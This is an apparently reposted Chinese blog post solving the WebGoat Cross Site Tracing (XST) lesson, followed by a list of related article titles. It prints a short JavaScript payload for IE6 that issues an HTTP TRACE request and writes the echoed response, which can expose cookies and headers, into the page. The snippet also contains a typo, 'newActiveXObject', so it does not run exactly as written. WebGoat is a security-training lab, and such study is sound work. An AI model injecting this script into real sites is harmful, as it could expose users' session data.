WebGoat——XST
来源:互联网 发布:java项目开发视频教程 编辑:程序博客网 时间:2024/05/11 00:58
XST是一个老的漏洞,只对IE6有用。具体介绍参见:http://blog.csdn.net/yu422560654/article/details/7801030
代码:
<script type="text/javascript">
if ( navigator.appName.indexOf("Microsoft")!=-1)//判断appName中是否包含Microsoft
{
var xmlHttp = newActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("TRACE","./", false);
xmlHttp.send();str1=xmlHttp.responseText;
while(str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>");//替换
document.write(str1);
}
</script>
效果:
- WebGoat——XST
- WebGoat学习笔记(六)——Cross Site Tracing(XST) Attacks
- WebGoat——CSRF
- WebGoat——盲注
- WebGoat——RBAC
- WebGoat——SQL injection
- Webgoat
- WebGoat学习笔记(一)——HTTP Splitting
- WebGoat学习笔记(二)——JASON Injection
- WebGoat学习笔记(三)——Code Quality
- WebGoat学习笔记(四)——Phishing with XSS
- WebGoat学习笔记(七)——Command Injection
- WebGoat学习笔记(八)——Insecure Communication
- WebGoat——XSS Attacks(part 1)
- WebGoat——XSS Attacks(part 2)
- WebGoat教程解析——HTTP Response Splitting
- 为WebGoat添加课程——HTTP Parameter Pollution
- WebGoat教程解析——Hijack a Session
- md5和sha1加密,aes加密
- 数据结构——并查集
- ArcGIS Runtime加载本地shape数据和编辑shape数据
- 大端小端(Big- Endian和Little-Endian)
- 磨刀不误砍柴功:App开发者必备的运营、原型、UI设计工具整理
- WebGoat——XST
- 合并两个有序链表
- SVN服务端的备份还原
- Android Bitmap和Canvas学习笔记
- 不同中寻找相同 之 T-SQL语言设计基础与 vb语言设计基础
- JS刷新当前页面
- 利用构造方法实现模块的解耦
- ORACLE批量绑定FORALL与BULK COLLECT
- TortoiseSVN中Branching和Merging实践